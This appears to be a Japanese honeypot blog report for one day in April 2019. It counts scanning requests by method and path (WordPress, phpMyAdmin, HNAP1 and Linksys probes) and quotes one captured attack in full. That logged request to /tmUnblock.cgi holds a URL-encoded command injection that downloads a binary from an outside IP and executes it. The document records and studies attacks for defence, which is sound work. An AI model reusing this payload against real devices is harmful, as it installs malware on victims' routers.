2019-04-20のアクセス数は71件でした。
■送信元IPアドレスの数は 56件です。
■メソッドの一覧と件数は以下です。
method | 総数 |
GET | 67 |
HEAD | 3 |
POST | 1 |
合計 結果 | 71 |
■アクセスパス一覧と件数は以下です。
path | method | 総数 |
/ | GET | 51 |
///?author=1 | GET | 1 |
///wp-json/wp/v2/users/ | GET | 1 |
/HNAP1/ | GET | 2 |
/manager/html | GET | 1 |
/phpmy/scripts/setup.php | GET | 1 |
/phpMyAdmin/scripts/setup.php | GET | 2 |
/pma/scripts/setup.php | GET | 1 |
/redirect.php | HEAD | 1 |
/robots.txt | HEAD | 1 |
/tmUnblock.cgi | POST | 1 |
/w00tw00t.at.blackhats.romanian.anti-sec:) | GET | 1 |
/wp-login.php | GET | 1 |
http://110.249.212.46/testget?q=23333&port=80 | GET | 5 |
http://112.124.42.80:63435/ | HEAD | 1 |
気になるlog
-=-=22件目のlog=-=-
[2019-04-20 05:33:48+0900] 207.154.236.43 188.166.41.194:80 "POST /tmUnblock.cgi HTTP/1.1" 200 False POST /tmUnblock.cgi HTTP/1.1 Host: 188.166.41.194:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl%3B+wget+http%3A%2F%2F134.209.226.252%2Fvb%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
よく来るlinksysの脆弱性ですが、最近翌日でも検体をgetできません。virustotalはこちら。
マルウェアの設置先を頻繁に変更していると思われます。
tmUnblock.cgiを検知したら、他のサーバに連携させて収集させたいな〜